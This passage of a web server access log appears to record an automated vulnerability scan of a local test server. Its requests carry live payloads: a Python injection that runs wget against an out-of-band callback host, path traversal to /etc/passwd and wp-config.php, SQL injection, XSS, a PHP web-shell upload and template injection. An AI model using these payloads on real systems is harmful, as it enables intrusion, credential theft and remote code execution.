AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca285tosmpvbafqg07h09gsxx4ou34t9h.oast.fun%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all_dbs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxcum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/config.exp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iPages/i_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dumpmdm.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.axd?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?locale=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"username=apollo&password=admin&login-submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /signin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/signin?", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"step=1&Language=de{${system(\x22ls\x22)}}&NextBtn=Weiter+%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mailingupgrade.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F29KAXx7oiFgRFq4V3vBO6XoEZYz.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?login=lutron&password=lutron HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dc2/admin/auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA